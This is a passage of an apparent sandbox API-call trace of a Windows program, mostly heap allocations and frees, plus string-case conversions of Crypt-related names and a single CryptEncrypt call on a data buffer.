lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.054] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0268.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0268.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51df0 [0268.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51df0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0268.055] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2b990*, pdwDataLen=0x8cef60*=0x731b, dwBufLen=0x7320 | out: pbData=0x2f2b990*, pdwDataLen=0x8cef60*=0x7320) returned 1 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0268.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0268.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0268.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0268.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0268.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0268.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0268.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0268.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0268.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0268.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0268.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0268.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0268.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0268.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0268.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0268.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0268.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0268.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0268.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0268.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0268.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0268.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0268.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0268.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0268.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7320) returned 0x2f32cb8 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7320) returned 0x2f39fe0 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f32cb8 | out: hHeap=0x970000) returned 1 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0268.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.099] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0268.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.099] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.100] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0268.100] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0268.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0268.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0268.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 